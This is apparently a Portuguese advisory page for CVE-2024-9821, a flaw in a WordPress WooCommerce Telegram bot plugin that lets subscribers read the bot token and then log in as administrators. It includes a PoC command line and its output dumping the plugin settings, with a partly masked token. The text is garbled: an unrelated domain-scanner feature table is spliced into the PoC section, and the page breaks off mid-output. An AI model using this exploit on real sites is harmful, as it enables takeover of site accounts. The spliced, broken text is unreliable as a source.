
Bot para Telegram no WooCommerce <= 1.2.4 - Divulgação do Token do Bot do Telegram Autenticado (Subscriber+) para Bypass de Autenticação
Bot for Telegram on WooCommerce <= 1.2.4 - Autenticado (Assinante+) Divulgação de Token do Bot do Telegram para Bypass de Autenticação
O plugin Bot for Telegram on WooCommerce para WordPress é vulnerável à divulgação de informações sensíveis devido à falta de verificações de autorização na ação AJAX 'stm_wpcfto_get_settings' em todas as versões até, e incluindo, 1.2.4. Isso possibilita que atacantes autenticados, com nível de acesso de assinante ou superior, visualizem o Token do Bot do Telegram, um token secreto usado para controlar o bot, que pode então ser usado para fazer login como qualquer usuário existente no site, como um administrador, se souberem o nome de usuário, devido ao recurso Login with Telegram.``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821
* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* Link de download: [Baixar bot-for-telegram-on-woocommerce Versão 1.2.4](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)
POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
estado. Se v
Você precisa ter muito cuidado com os nomes de domínio que possui, pois um único erro pode levar à perda de tudo que você tem.
Você pode obter a lista de domínios criptografados a partir deste gist.
-->
| Funcionalidade | Estado |
|---|---|
| Idade do domínio (em anos) | ✅ |
| Serviços extras do domínio (pesquisar por "dns", "www", "email") | ✅ |
Comando host para obter o IP por trás de um domínio | ✅ |
| Registrador do domínio | ✅ |
| Data de criação do domínio | ✅ |
| Data de expiração do domínio | ✅ |
| Data da última atualização do domínio | ✅ |
| Whois reverso (email, nome, organização) | ✅ |
| Servidor de nomes do domínio (NS) | ✅ |
| Troca de correio do domínio (MX) | ✅ |
| 'get' o JSON completo para um domínio | ✅ |
| 'get' a chave específica da saída JSON | ✅ |
Varredura de múltiplos domínios com -l ou --list | ✅ |
| Saída JSON transparente (se você quiser canalizar dados para outro lugar, estará em um formato JSON adequado) | ✅ |
| User-Agent aleatório | ✅ |
Saída colorida no terminal (se não quiser cores, use --no-color) | ✅ |
Exportar para JSON ou XLSX (por padrão, se usar -o/--output, exportará para CSV) | ✅ |
| Varredura de domínios a partir de uma wordlist (leia mais: Suporte a wordlist) | ✅ |
Escrever em um arquivo (usando -w ou --write) | ✅ |
Limite de exibição (com -dl ou --display-limit) | ✅ |
| Validação de serviços HTTP/HTTPS e não HTTP | ✅ |
(Novo) Varredura sequencial em vez de varredura encadeada: você pode passar -seq ou --sequential | ✅ |
Suporte a proxy SOCKS5 (com --socks5 ou --proxy) | 🔴 (Testando) |
| Suporte multiplataforma | ✅ |
| Suporte a Docker (leia mais: Executar com Docker) | ✅ |
| Vulnerability check: http://kubernetes.docker.internal | |
| Logged in successfully. | |
| { 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram ' |
'Bot Token',
'type': 'text',
'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'},
'bftow_bot_name': { 'description': 'Set '
'if '
'you '
'want '
'user '
'to '
'get '
'back '
'to '
'Telegram '
'after '
'successful '
'checkout. '
'(Without '
'"@")',
'label': 'Telegram '
'Bot Name',
'type': 'text',
'value': 'Superbotman'},
'bftow_buttons': { 'description': 'Save '
'BOT '
'Token '
'first',
'label': 'Activate '
'API URL',
'type': 'bftow_webhook_activation',
'value': ''},
'bftow_google_maps_api_key': { 'description': '<a '
'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide '
'Google '
'Maps '
'API '
'key</a> '
'with '
'enabled '
'geocoding '
'API '
'and '
'configured '
'billing '
'account. '
'If '
'you '
'leave '
'this '
'field '
'empty, '
'the '
'location '
'will '